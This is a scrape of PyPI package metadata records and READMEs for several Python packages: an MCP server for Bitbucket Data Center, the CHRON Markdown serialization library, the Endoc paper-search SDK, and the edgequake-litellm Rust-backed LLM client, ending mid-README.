[MIT](LICENSE) © 2026 tokitahmidtoufa
| text/markdown | tokitahmidtoufa | null | null | null | null | timer, profiler, memory, performance, benchmark, execution time, developer tools, debugging | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Intended Audience :: Education",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Debuggers",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: System :: Benchmark",
"Operating System :: OS Independent"
] | [] | null | null | >=3.7 | [] | [] | [] | [] | [] | [] | [] | [
"Homepage, https://github.com/tokitahmidtoufa/cntimer",
"Repository, https://github.com/tokitahmidtoufa/cntimer",
"Bug Tracker, https://github.com/tokitahmidtoufa/cntimer/issues",
"Changelog, https://github.com/tokitahmidtoufa/cntimer/releases"
] | twine/6.2.0 CPython/3.14.2 | 2026-02-20T09:09:40.757665 | cntimer-0.1.11.tar.gz | 7,017 | ef/36/cb9f7728b81dc5467a09b2d6484371548568923656a3614759fa15a43769/cntimer-0.1.11.tar.gz | source | sdist | null | false | 813b4d620ae26ab953f2f9d3312fcba3 | 27acc4042825549818958df4ba98a23a0d9299831a77052b67d77b5e987730a5 | ef36cb9f7728b81dc5467a09b2d6484371548568923656a3614759fa15a43769 | MIT | [
"LICENSE"
] | 220 |
2.4 | mcp-bitbucket-dc | 0.2.0 | MCP server for Bitbucket Data Center — code search, file browsing, PRs, commits, and more. | # mcp-bitbucket-dc
[](https://pypi.org/project/mcp-bitbucket-dc/)
[](LICENSE)
MCP (Model Context Protocol) server for **Bitbucket Data Center**. Enables AI assistants to search code, browse files, manage pull requests, and explore repositories through a standardized interface.
Built with [FastMCP](https://github.com/jlowin/fastmcp) in Python. Installs via `uvx` — no Node.js required.
## Quick Start
### 1. Generate a Personal Access Token
1. Log in to your Bitbucket Data Center instance
2. Go to **Manage Account → HTTP access tokens**
3. Click **Create token**
4. Set permissions: **Repository Read** (and **Write** if you need PR creation/commenting)
5. Copy the token
### 2. Configure Your IDE
Add to your MCP configuration (`mcp.json` in VS Code, `claude_desktop_config.json` for Claude Desktop):
```json
{
"mcpServers": {
"bitbucket-dc": {
"command": "uvx",
"args": ["mcp-bitbucket-dc"],
"env": {
"BITBUCKET_HOST": "git.yourcompany.com",
"BITBUCKET_API_TOKEN": "your-personal-access-token"
}
}
}
}
```
That's it. The server starts automatically when your IDE connects.
### 3. Start Using
Ask your AI assistant:
- *"Search for CompanyInfoUpdater in the codebase"*
- *"Show me the file structure of the api-service repo in PROJECT"*
- *"Get the content of src/main/Application.java from repo backend"*
- *"List open pull requests in PROJECT/my-repo"*
- *"What branches exist in PROJECT/my-repo?"*
## Tools Reference
### Code Search (NEW)
| Tool | Description |
|---|---|
| `bitbucket_code_search` | Search code across all repos with Lucene syntax (`ext:java`, `lang:python`, `repo:name`, `project:KEY`, `AND`/`OR`/`NOT`) |
### File Browsing (NEW)
| Tool | Description |
|---|---|
| `bitbucket_browse` | Browse directory tree (files & folders at a path) |
| `bitbucket_get_file_content` | Get raw file content with syntax highlighting |
| `bitbucket_list_files` | Recursively list all file paths in a repo |
| `bitbucket_get_branches` | List branches (filterable) |
| `bitbucket_get_tags` | List tags (filterable) |
### Projects & Repositories
| Tool | Description |
|---|---|
| `bitbucket_get_projects` | List projects (filterable by name/permission) |
| `bitbucket_get_project` | Get project details |
| `bitbucket_get_repositories` | List repos in a project |
| `bitbucket_get_repository` | Get repo details with clone URLs |
### Pull Requests
| Tool | Description |
|---|---|
| `bitbucket_get_pull_requests` | List PRs (filter by state, direction, text) |
| `bitbucket_get_pull_request` | Get PR details with reviewers |
| `bitbucket_get_pull_request_comments` | Get PR comments and activity |
| `bitbucket_get_pull_request_changes` | Get files changed in a PR |
| `bitbucket_get_pull_request_diff` | Get diff for a file in a PR |
| `bitbucket_post_pull_request_comment` | Post a comment (general or inline) |
| `bitbucket_create_pull_request` | Create a new PR |
| `bitbucket_update_pull_request` | Update PR title/description/reviewers |
| `bitbucket_get_required_reviewers` | Get required reviewers for a branch pair |
### Commits
| Tool | Description |
|---|---|
| `bitbucket_get_commits` | List commits (filter by path, ref range) |
## Search Query Syntax
The `bitbucket_code_search` tool uses Lucene-style queries:
```
# Simple text search
CompanyInfoUpdater
# Filter by file extension
function ext:java
# Filter by language
config lang:python
# Filter by repository or project
DatabaseHelper repo:backend-api
service project:PLATFORM
# Filter by path
controller path:src/main
# Boolean operators (must be UPPERCASE)
config AND (yaml OR yml)
test NOT unit
UserService AND ext:java AND project:CORE
```
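Since the filters compose as plain space-separated terms, a query string can also be assembled programmatically. A small sketch — `build_query` is a hypothetical helper for illustration, not part of this package:

```python
def build_query(text, **filters):
    """Compose a Lucene-style Bitbucket code-search query string."""
    parts = [text]
    for key, value in filters.items():
        parts.append(f"{key}:{value}")  # e.g. ext:java, project:CORE
    return " ".join(parts)

query = build_query("UserService", ext="java", project="CORE")
# -> 'UserService ext:java project:CORE'
```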
## Configuration
| Environment Variable | Required | Description |
|---|---|---|
| `BITBUCKET_HOST` | Yes* | Bitbucket DC hostname (e.g. `git.company.com`) |
| `BITBUCKET_URL` | Yes* | Full base URL alternative (e.g. `https://git.company.com`) |
| `BITBUCKET_API_TOKEN` | Yes | Personal Access Token |
\* Provide either `BITBUCKET_HOST` or `BITBUCKET_URL`, not both.
## Alternative Transports
```bash
# SSE transport (for remote/multi-user setups)
uvx mcp-bitbucket-dc --transport sse --port 8000
# Streamable HTTP
uvx mcp-bitbucket-dc --transport streamable-http --port 8000
```
## Development
```bash
# Clone and install
git clone https://github.com/christopherekfeldt/mcp-bitbucket-dc.git
cd mcp-bitbucket-dc
uv sync
# Run locally
export BITBUCKET_HOST=git.yourcompany.com
export BITBUCKET_API_TOKEN=your-token
uv run mcp-bitbucket-dc
# Run tests
uv run pytest
```
## License
MIT — see [LICENSE](LICENSE).
| text/markdown | Christopher Ekfeldt | null | null | null | MIT | atlassian, bitbucket, code-search, data-center, mcp | [
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Topic :: Software Development :: Version Control :: Git"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"click>=8.1.0",
"fastmcp>=2.0.0",
"httpx>=0.27.0",
"pydantic>=2.0"
] | [] | [] | [] | [
"Homepage, https://github.com/christopherekfeldt/mcp-bitbucket-dc",
"Repository, https://github.com/christopherekfeldt/mcp-bitbucket-dc",
"Issues, https://github.com/christopherekfeldt/mcp-bitbucket-dc/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:09:29.285784 | mcp_bitbucket_dc-0.2.0.tar.gz | 107,420 | f1/82/58b0fa5cf7b6c90f1294a76b4929f4c2115a3e8ffc3234746afd21b127b6/mcp_bitbucket_dc-0.2.0.tar.gz | source | sdist | null | false | ba9e8430c547c18ac2fc6f15e852bc1c | da568ce16d883be7b06da7694fbdc3d857d554ed0c1cd5daacf058e260d7e9dc | f18258b0fa5cf7b6c90f1294a76b4929f4c2115a3e8ffc3234746afd21b127b6 | null | [
"LICENSE"
] | 211 |
2.4 | chronml | 0.1.0 | CHRON: Configurable Human-Readable Object Notation | # CHRON
CHRON stands for **Configurable Human-Readable Object Notation**.
CHRON is a Python library for round-tripping structured objects through
review-friendly Markdown text with explicit marker metadata.
## Why CHRON
- Human-readable output for review and diff.
- Machine-loadable with deterministic reconstruction.
- Typed records supported through `pydantic` model metadata.
- Configurable marker namespace prefix.
- No regex parsing in core codec paths.
- Marker-level grammar parsed via `lark`.
- JSON path resolution and matching via `jsonpath_ng`.
## Install
```bash
pip install chronml
```
## Quick Start
```python
from chronml import Chron
chronml = Chron()
records = [
{"title": "hello", "body": "line1\nline2"}
]
md = chronml.dumps(records, template="# {$.title}\n\n{$.body:block}")
print(md)
loaded = chronml.loads(md)
assert loaded[0]["title"] == "hello"
assert loaded[0]["body"] == "line1\nline2"
```
## Markdown Output Examples
### 1) Inline + Block
Python:
```python
from chronml import Chron
chronml = Chron()
md = chronml.dumps(
[{"title": "hello", "body": "line1\nline2"}],
template="# {$.title}\n\n{$.body:block}",
)
print(md)
```
Output:
```markdown
<!-- chronml:begin type=json skeleton={} -->
# <!-- chronml:value-begin json-path=$.title --> hello <!-- chronml:value-end -->
<!-- chronml:multi-line-value-begin json-path=$.body -->
line1
line2
<!-- chronml:multi-line-value-end -->
<!-- chronml:end -->
```
### 2) Code Block
Python:
```python
from chronml import Chron
chronml = Chron()
md = chronml.dumps(
[{"code": "print(1)\nprint(2)"}],
template="{$.code:code-block-python}",
)
print(md)
```
Output:
````markdown
<!-- chronml:begin type=json skeleton={} -->
<!-- chronml:code-block-begin lang=python json-path=$.code -->
```python
print(1)
print(2)
```
<!-- chronml:code-block-end -->
<!-- chronml:end -->
````
### 3) Wildcard Multi-Match (`[*]`)
Python:
```python
from chronml import Chron
chronml = Chron()
md = chronml.dumps(
[{"items": [{"name": "A"}, {"name": "B"}]}],
template="items: {$.items[*].name}",
)
print(md)
```
Output (flattened with concrete paths):
```markdown
<!-- chronml:begin type=json skeleton={"items": [{}, {}]} -->
items: <!-- chronml:value-begin json-path=$.items[0].name --> A <!-- chronml:value-end --> <!-- chronml:value-begin json-path=$.items[1].name --> B <!-- chronml:value-end -->
<!-- chronml:end -->
```
### 4) Nested Model Template Expansion
Python:
```python
from pydantic import BaseModel
from chronml import Chron
class Child(BaseModel):
x: int
y: str
__chronml_template__ = "X={$.x}\nY={$.y}"
class Parent(BaseModel):
name: str
child: Child
__chronml_template__ = "N={$.name}\n{$.child}"
chronml = Chron()
md = chronml.dumps([Parent(name="p", child=Child(x=5, y="yy"))], template="")
print(md)
```
Output (nested paths rewritten to global paths):
```markdown
<!-- chronml:begin type=pydantic:__main__.Parent skeleton={"child": {}} -->
N=<!-- chronml:value-begin json-path=$.name --> p <!-- chronml:value-end -->
X=<!-- chronml:value-begin type=int json-path=$.child.x --> 5 <!-- chronml:value-end -->
Y=<!-- chronml:value-begin json-path=$.child.y --> yy <!-- chronml:value-end -->
<!-- chronml:end -->
```
## Core API
- `Chron.loads(text) -> list[record]`
- `Chron.load(path) -> list[record]`
- `Chron.dumps(records, template=..., template_func=...) -> str`
- `Chron.dump(records, path, template=..., template_func=...) -> None`
Module-level helpers with the same names are also exported:
`loads`, `load`, `dumps`, `dump`.
## Template Syntax
Placeholder forms:
- `{$.path}` inline value
- `{$.path:inline}` inline value
- `{$.path:block}` multi-line value block
- `{$.path:code-block}` fenced code block
- `{$.path:code-block-python}` fenced code block with language
- `{$.items[*].name}` multi-match flattening
For wildcard and other multi-match expressions, CHRON expands all matches in
result order. Emitted marker paths are concrete (`$.items[0].name`, ...).
## Marker Prefix
Default prefix is `chronml:`.
```python
chronml = Chron(marker_prefix="custom:")
```
Then markers are emitted as:
- `<!-- custom:begin ... -->`
- `<!-- custom:value-begin ... -->`
- `<!-- custom:end -->`
## Pydantic Support
If a record is a `pydantic.BaseModel`, CHRON stores record type metadata as
`type=pydantic:<module>.<ClassName>` and reconstructs model instances on load.
Template resolution order per record:
1. `obj.__chronml_template__` (string only)
2. `template_func(obj)`
3. `template` argument
Nested model templates are expanded in place for inline/default placeholders,
and nested paths are rewritten to global paths.
## Escaping and Round-Trip Guarantees
CHRON escapes marker-like payload text, including existing escaped marker
literals, with reversible encoding. This preserves:
- leading/trailing spaces in inline text
- multi-line content and trailing spaces in block mode
- marker-like text inside payload content
## Protocol and AST
- Marker AST spec: `docs/ast-spec.md`
- Release checklist: `docs/release.md`
## Development
Run tests:
```bash
uv run --with pytest pytest tests -q
```
Build artifacts:
```bash
uv run --with build python -m build
```
| text/markdown | CHRON contributors | null | null | null | MIT | chronml, markdown, object-notation, serialization, template | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Developers",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Software Development :: Libraries"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"jsonpath-ng>=1.6.1",
"lark>=1.2.0",
"pydantic>=2.0.0",
"build>=1.2.0; extra == \"dev\"",
"pytest>=8.0; extra == \"dev\"",
"twine>=5.0.0; extra == \"dev\""
] | [] | [] | [] | [
"Homepage, https://github.com/your-org/chronml",
"Repository, https://github.com/your-org/chronml",
"Issues, https://github.com/your-org/chronml/issues"
] | twine/6.2.0 CPython/3.12.12 | 2026-02-20T09:09:28.629150 | chronml-0.1.0.tar.gz | 61,861 | c4/f9/88eee7ebad8c352e4896ef9fe1acdcf752630c82f1fd8a09bfaae1a96318/chronml-0.1.0.tar.gz | source | sdist | null | false | 522f14c4799cd6575fe32d476acda4ca | 6c64529bea1054c36a506a0eaaac22a35ecbab71eebb76ab5604d70bd4d08a35 | c4f988eee7ebad8c352e4896ef9fe1acdcf752630c82f1fd8a09bfaae1a96318 | null | [] | 253 |
2.4 | endoc | 1.7.1 | Endoc SDK: A note-taking app SDK powered by LLMs | <div style="text-align: center;">
<img src="https://drive.google.com/uc?export=view&id=18VZK4uejxuPABSQOAiXK2l2EziYwDvdb" alt="Endoc SDK Logo" style="width:50%;">
</div>
<p align="center">
<img src="https://img.shields.io/pypi/pyversions/endoc?logo=python&logoColor=%23ffd343&color=%23ffd343" />
<img src="https://img.shields.io/pypi/l/endoc" />
<img src="https://img.shields.io/pypi/v/endoc?logo=pypi&logoColor=%23ffd343&color=%23ffd343" />
<img src="https://img.shields.io/pypi/dm/endoc?style=flat&color=red" />
<img src="https://img.shields.io/pypi/dd/endoc" />
<a href="https://endoc.ethz.ch">
<img src="https://img.shields.io/badge/powered_by-Endoc-blue" alt="Powered by Endoc">
</a>
</p>
# Endoc SDK
Endoc SDK is a Python library that provides powerful tools for advanced paper search, summarization, and note management using a GraphQL API. It leverages [Pydantic](https://pydantic-docs.helpmanual.io/) for robust data validation and modeling, so that all responses are returned as easy‐to‐use Python objects. In addition, Endoc SDK offers an extensibility mechanism to allow you to create custom composite services without modifying the core code.
## Features
- **Document Search:** Search and filter papers using ranking variables and keywords.
- **Summarize Paper:** Generate summaries for individual papers.
- **Paginated Search:** Retrieve paginated search results.
- **Single Paper Search:** Get detailed information about a single paper.
- **Note Library:** Retrieve papers associated with a note.
- **Title Search:** Resolve papers from title lists.
- **PDF Import (API key flow):** Upload local PDFs for indexing/import.
- **Custom Services:** Easily extend the client with your own functions.
## Installation
Install Endoc SDK via pip:
```bash
pip install endoc
```
## Setup
1. **Obtain Your API Key:**
- Visit [https://endoc.ethz.ch](https://endoc.ethz.ch) and sign up using your Switch Edu-ID credentials.
- After logging in, click on the **Account** option in the side panel.
- Under the **Developer API** section, click **Generate** to create a new API key.
- Copy the generated API key for later use.
2. **Create a `.env` File (optional):**
- In your project's root directory, create a file named `.env`.
- Add your API key to the file using one of these supported keys:
```
ENDOC_API_KEY=your_api_key_here
# or
API_KEY=your_api_key_here
```
3. **Load Environment Variables (if using `.env`):**
- Install [python-dotenv](https://pypi.org/project/python-dotenv/) if you haven't already:
```bash
pip install python-dotenv
```
- In your Python script:
```python
from dotenv import load_dotenv
load_dotenv()
```
4. **Instantiate the Endoc client**
- In your Python script, instantiate `EndocClient`:
```python
from endoc import EndocClient

client = EndocClient(api_key=None)  # reads ENDOC_API_KEY/API_KEY from env
# or
client = EndocClient(api_key="your_api_key_here")
```
5. **(Optional) Override GraphQL endpoint**
- By default the SDK uses:
`https://endoc.ethz.ch/graphql`
- To target another deployment (e.g. local gateway), set:
```
ENDOC_GRAPHQL_URL=http://localhost:9000/graphql
```
## Basic Usage
### 1) Document Search
To search for papers, call the `document_search` method. This returns a `DocumentSearchData` object.
```python
doc_search_result = client.document_search(
ranking_variable="BERT",
keywords=["AvailableField:Content.Fullbody_Parsed"]
)
# Accessing properties:
print(doc_search_result.status)
print(doc_search_result.response.search_stats.nMatchingDocuments)
print(doc_search_result.response.paper_list[0].id_value)
```
### 2) Summarize Paper
Call the summarize method with a paper ID to get a summary. The result is a `SummarizationResponseData` object.
```python
summarize_result = client.summarize("221802394")
# Example usage:
print(summarize_result.status)
# You can further inspect summarize_result.response for detailed summary items.
```
### 3) Paginated Search
Use the `paginated_search` method to retrieve paginated results. Prepare a list of paper metadata as input.
```python
example_paper = {
"collection": "S2AG",
"id_field": "id_int",
"id_type": "int",
"id_value": "221802394"
}
paper_list = [example_paper]
paginated_result = client.paginated_search(paper_list=paper_list)
# Example usage:
print(paginated_result.status)
```
### 4) Single Paper Search
To fetch detailed information for a single paper, use the `single_paper` method. This returns a `SinglePaperData` object.
```python
single_paper_result = client.single_paper("221802394")
# Example usage:
print(single_paper_result.response.Title)
```
### 5) Get Note Library
Retrieve papers related to a note by calling the `get_note_library` method. This returns a `GetNoteLibraryResponse` object. To find your note ID, navigate to a note on Endoc and copy the last part of the URL, e.g. for `https://endoc.ethz.ch/note/679a1e2e5b25cf001a7c7157`, the note's ID is `679a1e2e5b25cf001a7c7157`.
```python
note_library_result = client.get_note_library("679a1e2e5b25cf001a7c7157")
if note_library_result.response:
print(note_library_result.response[0].id_value)
```
### 6) Import PDFs from local folder
```python
result_batches = client.import_pdfs_from_folder(
folder_path="/absolute/path/to/pdfs",
recursive=False,
max_file_mb=50,
batch_size=5,
)
for batch in result_batches:
print(batch.status, batch.message, len(batch.response or []))
```
Or use the example script:
```bash
python examples/upload_pdf.py --folder "/absolute/path/to/pdfs"
```
## Extending the Client with Custom Services
Endoc SDK allows you to add your own composite services without modifying the core code. You have two options:
### Option 1: Using the `register_service` Decorator
Endoc SDK re-exports the `register_service` decorator, so you can define custom methods that become part of the client interface. For example:
```python
from endoc import register_service
@register_service("combined_search")
def combined_search(self, paper_list, id_value):
paginated = self.paginated_search(paper_list, keywords=["example"])
single = self.single_paper(id_value)
return {"paginated": paginated, "single": single}
result = client.combined_search(paper_list, "221802394")  # assumes `client` and `paper_list` from earlier examples
print("Combined Search Result:", result)
```
### Option 2: Using the `register_service` Method
Alternatively, you can register a custom service function directly on the client instance:
```python
def my_custom_service(paper_list, id_value):
paginated = client.paginated_search(paper_list, keywords=["custom"])
single = client.single_paper(id_value)
return {"paginated": paginated, "single": single}
client.register_service("my_custom_service", my_custom_service)
result = client.my_custom_service(paper_list, "221802394")
print("My Custom Service Result:", result)
```
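Conceptually, this kind of registration can be approximated with the sketch below (illustrative only, not the SDK's actual implementation — the class and method names are made up):

```python
class MiniClient:
    """Toy client that resolves registered services on attribute access."""
    _services = {}

    @classmethod
    def add_service(cls, name, func):
        cls._services[name] = func

    def __getattr__(self, name):
        # only called when normal attribute lookup fails
        try:
            func = self._services[name]
        except KeyError:
            raise AttributeError(name)
        # bind the client instance as the first argument
        return lambda *args, **kwargs: func(self, *args, **kwargs)

def register_service(name):
    def decorator(func):
        MiniClient.add_service(name, func)
        return func
    return decorator

@register_service("greet")
def greet(self, who):
    return f"hello {who}"
```

With this in place, `MiniClient().greet("world")` dispatches through `__getattr__` to the registered function.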
## Package Structure
The package is organized as follows:
```plaintext
endoc/
├── __init__.py
├── client.py
├── decorators.py
├── endoc_client.py
├── exceptions.py
├── queries.py
├── models/
│ ├── document_search.py
│ ├── note_library.py
│ ├── paginated_search.py
│ ├── pdf_import.py
│ ├── single_paper.py
│ ├── summarization.py
│ └── title_search.py
└── services/
├── document_search.py
├── get_note_library.py
├── paginated_search.py
├── pdf_import.py
├── single_paper_search.py
├── summarization.py
└── title_search.py
examples/
├── test_document_search.py
└── upload_pdf.py
tests/
├── conftest.py
├── fixtures/
└── unit/
├── test_auth.py
├── test_custom_services.py
├── test_document_search.py
├── test_paginated_search.py
├── test_pdf_import.py
├── test_single_paper.py
└── test_summarization.py
```
## Environment Variables
Supported variables:
- `ENDOC_API_KEY` or `API_KEY`: API key used by the SDK.
- `ENDOC_GRAPHQL_URL` (optional): override default endpoint (`https://endoc.ethz.ch/graphql`).
Use a `.env` file and `python-dotenv` to load variables:
```python
from dotenv import load_dotenv
load_dotenv()
```
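The lookup order sketched below assumes `ENDOC_API_KEY` takes precedence over `API_KEY` (an assumption — check the SDK source if the order matters to you):

```python
import os

def resolve_api_key():
    # prefer the namespaced variable, fall back to the generic one
    return os.getenv("ENDOC_API_KEY") or os.getenv("API_KEY")
```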
## Testing
Endoc SDK includes a test suite to ensure quality and maintain high coverage. The tests are organized by functionality, making it easy to add new tests or modify existing ones.
- Make sure you have installed `pytest` and any other test dependencies:
```bash
pip install pytest
```
### Running the Tests
In the SDK root (`endoc-sdk/`), run:
```bash
python -m pytest
```
### Test Organization
#### Fixtures
The `tests/fixtures` folder holds reusable components like mock responses and dummy clients (e.g., `dummy_api.py`).
A `document_search_fixtures.py` file might contain fixtures that set up data or patch classes for document search tests.
#### Unit Tests
Located in `tests/unit`, these tests focus on individual modules or classes, mocking external calls.
For example, `test_document_search.py` might ensure the `DocumentSearchService` parses JSON correctly.
#### Integration Tests
Placed in `tests/integration`, these tests cover how multiple parts of the SDK interact. They may call real endpoints in a staging environment or use more extensive mocks that simulate multi-step workflows.
#### `conftest.py`
Pytest automatically discovers and uses any fixtures defined in `conftest.py`.
You can place shared fixtures here (like a global mock of your API client or environment setup).
## Contributing
Contributions are welcome! Please open issues or submit pull requests on the GitHub repository. Ensure that any contributions adhere to the existing code style and include tests where applicable.
## License
This project is licensed under the MIT license.
| text/markdown | null | Grigor Dochev <gdochev@ethz.ch>, Andreas Giannoutsos <agiannoutsos@ethz.ch> | null | null | MIT | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent"
] | [] | null | null | >=3.7 | [] | [] | [] | [
"gql[requests]>=3.5.0",
"pydantic>=1.10"
] | [] | [] | [] | [
"Homepage, https://github.com/science-editor/endoc-sdk"
] | twine/6.2.0 CPython/3.11.14 | 2026-02-20T09:08:45.605367 | endoc-1.7.1.tar.gz | 16,529 | 0c/18/c3c68a0ed9b737c2ce6347c437e92b5e877dcd2903a23369923b695162d4/endoc-1.7.1.tar.gz | source | sdist | null | false | 656c2ff8362ebe1b8f33a01f1f6def5a | 7bc4a4e80cb93ac3be3e70a8ef4e83bab64eee49fa6e33e8f2936a8d983147cd | 0c18c3c68a0ed9b737c2ce6347c437e92b5e877dcd2903a23369923b695162d4 | null | [
"LICENSE"
] | 226 |
2.4 | edgequake-litellm | 0.1.1 | Drop-in LiteLLM replacement backed by Rust — same API, 10× lower latency | # edgequake-litellm
**Drop-in LiteLLM replacement backed by Rust — same API, lower overhead.**
[](https://pypi.org/project/edgequake-litellm/)
[](https://pypi.org/project/edgequake-litellm/)
[](https://github.com/raphaelmansuy/edgequake-llm/actions/workflows/python-ci.yml)
[](../LICENSE-APACHE)
`edgequake-litellm` wraps the [`edgequake-llm`](https://crates.io/crates/edgequake-llm) Rust core via [PyO3](https://pyo3.rs/), providing a high-performance drop-in for [LiteLLM](https://github.com/BerriAI/litellm). Swap the import — the rest of your code stays unchanged.
```python
# Before
import litellm
# After — same API, Rust-backed
import edgequake_litellm as litellm
```
## Features
- **LiteLLM-compatible API** — `completion()`, `acompletion()`, `stream()`, `embedding()`, same call signatures, same response shape (`resp.choices[0].message.content`).
- **Multi-provider routing** — OpenAI, Anthropic, Gemini, Mistral, OpenRouter, xAI, Ollama, LM Studio, HuggingFace, and more, via `provider/model` strings.
- **Async-native** — built on Tokio; sync and async Python both supported.
- **Single wheel per platform** — uses PyO3's `abi3-py39` stable ABI, one `.whl` covers Python 3.9–3.13+.
- **Zero Python runtime dependencies** — the Rust extension is self-contained.
- **Full type annotations** — ships with `py.typed` and `.pyi` stubs.
- **`max_completion_tokens` support** — works for all OpenAI model families including `o1`, `o3-mini`, `o4-mini`, `gpt-4.1`, `gpt-4.1-nano` that require this field.
- **Cache hit tokens** — `resp.cache_hit_tokens` exposes OpenAI prompt cache hits and Anthropic cache reads.
- **Reasoning tokens** — `resp.thinking_tokens` surfaces o-series reasoning and Claude extended thinking token counts.
## What's New in 0.1.1
- **`max_completion_tokens` fixed** for OpenAI o-series and gpt-4.1 model families (previously returned 400 Bad Request).
- **`resp.cache_hit_tokens`** — new property returning tokens served from provider cache (`None` if not applicable).
- **`resp.thinking_tokens`** — new property returning reasoning/thinking token count for o-series and Claude models.
- Both new properties are included in `resp.to_dict()`.
See [CHANGELOG.md](CHANGELOG.md) for the full history.
## Installation
```bash
pip install edgequake-litellm
```
## Quick Start
```python
import edgequake_litellm as litellm # drop-in import alias
# ── Synchronous chat ────────────────────────────────────────────────────────
resp = litellm.completion(
"openai/gpt-4o-mini",
[{"role": "user", "content": "Hello, world!"}],
)
# litellm-compatible access
print(resp.choices[0].message.content)
# convenience shortcut
print(resp.content)
# ── Asynchronous chat ───────────────────────────────────────────────────────
import asyncio
async def main():
resp = await litellm.acompletion(
"anthropic/claude-3-5-haiku-20241022",
[{"role": "user", "content": "Tell me a joke."}],
max_tokens=128,
temperature=0.8,
)
print(resp.choices[0].message.content)
asyncio.run(main())
# ── Streaming (async generator) ─────────────────────────────────────────────
async def stream_example():
messages = [{"role": "user", "content": "Count to five."}]
async for chunk in litellm.acompletion("openai/gpt-4o", messages, stream=True):
print(chunk.choices[0].delta.content or "", end="", flush=True)
# ── Embeddings ──────────────────────────────────────────────────────────────
result = litellm.embedding(
"openai/text-embedding-3-small",
["Hello world", "Rust is fast"],
)
# litellm-compatible access
print(result.data[0].embedding[:3])
# legacy list access still works
print(len(result), len(result[0])) # 2 1536
```
## Provider Routing
Pass `provider/model` as the first argument — the prefix selects the provider:
| Provider | Example model string |
|--------------|-----------------------------------------------------|
| OpenAI | `openai/gpt-4o` |
| Anthropic | `anthropic/claude-3-5-sonnet-20241022` |
| Google Gemini| `gemini/gemini-2.0-flash` |
| Mistral | `mistral/mistral-large-latest` |
| OpenRouter | `openrouter/meta-llama/llama-3.1-70b-instruct` |
| xAI | `xai/grok-3-beta` |
| Ollama | `ollama/llama3.2` |
| LM Studio | `lmstudio/local-model` |
| HuggingFace | `huggingface/mistralai/Mixtral-8x7B-Instruct-v0.1` |
| Mock (tests) | `mock/any-name` |
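The prefix routing can be illustrated with a small splitter (a sketch of the idea, not the crate's actual parsing code; the default-provider fallback is an assumption):

```python
def split_model(model_string, default_provider="openai"):
    """Split 'provider/model' on the FIRST slash, so nested model paths
    like 'openrouter/meta-llama/llama-3.1-70b-instruct' keep their own
    slashes in the model part."""
    if "/" in model_string:
        provider, model = model_string.split("/", 1)
        return provider, model
    return default_provider, model_string
```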
## API Reference
### `completion(model, messages, **kwargs) → ModelResponseCompat`
Synchronous chat completion. Blocks but releases the GIL during Rust I/O so other Python threads keep running.
```python
resp = litellm.completion(
"openai/gpt-4o",
messages,
max_tokens=256,
temperature=0.7,
system="You are a helpful assistant.",
max_completion_tokens=256, # alias for max_tokens; required for o1/o3/gpt-4.1 models
seed=42,
response_format={"type": "json_object"},  # {"type": "text"} or {"type": "json_object"}
)
# All of these access the same content:
resp.choices[0].message.content # litellm path
resp.content # shortcut
resp["choices"][0]["message"]["content"] # dict-style
resp.usage.total_tokens
resp.model
resp.response_ms # latency in milliseconds
resp.to_dict() # plain dict
# New in 0.1.1 — cache and reasoning token metadata
resp.cache_hit_tokens # int | None — tokens served from provider cache
resp.thinking_tokens # int | None — reasoning tokens (o-series, Claude)
resp.thinking_content # str | None — visible thinking text (Claude)
# The same data via usage object:
resp.usage.cache_read_input_tokens # same as resp.cache_hit_tokens
resp.usage.reasoning_tokens # same as resp.thinking_tokens
```
### `acompletion(model, messages, stream=False, **kwargs)`
Async chat completion. Returns `ModelResponseCompat` or (if `stream=True`) `AsyncGenerator[StreamChunkCompat, None]`.
```python
# Non-streaming
resp = await litellm.acompletion("openai/gpt-4o", messages)
# Streaming
async for chunk in await litellm.acompletion("openai/gpt-4o", messages, stream=True):
print(chunk.choices[0].delta.content or "", end="")
```
### `stream(model, messages, **kwargs) → AsyncGenerator[StreamChunk, None]`
Low-level streaming. Raw `StreamChunk` objects:
```python
async for chunk in litellm.stream("openai/gpt-4o", messages):
if chunk.content:
print(chunk.content, end="")
elif chunk.is_finished:
print(f"\n[stop: {chunk.finish_reason}]")
```
### `embedding(model, input, **kwargs) → EmbeddingResponseCompat`
Synchronous embeddings. Returns an `EmbeddingResponseCompat` that supports both litellm-style and legacy list-style access:
```python
result = litellm.embedding("openai/text-embedding-3-small", ["foo", "bar"])
# litellm path
result.data[0].embedding
# backwards-compatible list access
for vec in result: # iterates List[float]
print(len(vec))
result[0] # List[float]
len(result) # number of vectors
```
### `aembedding(model, input, **kwargs) → EmbeddingResponseCompat`
Async embeddings — same return type as `embedding()`.
### `stream_chunk_builder(chunks, messages=None) → ModelResponseCompat`
Reconstruct a full `ModelResponseCompat` from a collected list of streaming chunks:
```python
from edgequake_litellm import stream_chunk_builder
chunks = []
async for chunk in litellm.stream("openai/gpt-4o", messages):
chunks.append(chunk)
full = stream_chunk_builder(chunks, messages=messages)
print(full.content)
```
## Configuration
Module-level globals mirror `litellm`:
```python
import edgequake_litellm as litellm
litellm.set_verbose = True # enable debug logging
litellm.drop_params = True # drop unknown params (always True)
# Set default provider / model
litellm.set_default_provider("anthropic")
litellm.set_default_model("claude-3-5-haiku-20241022")
# Now the provider prefix can be omitted:
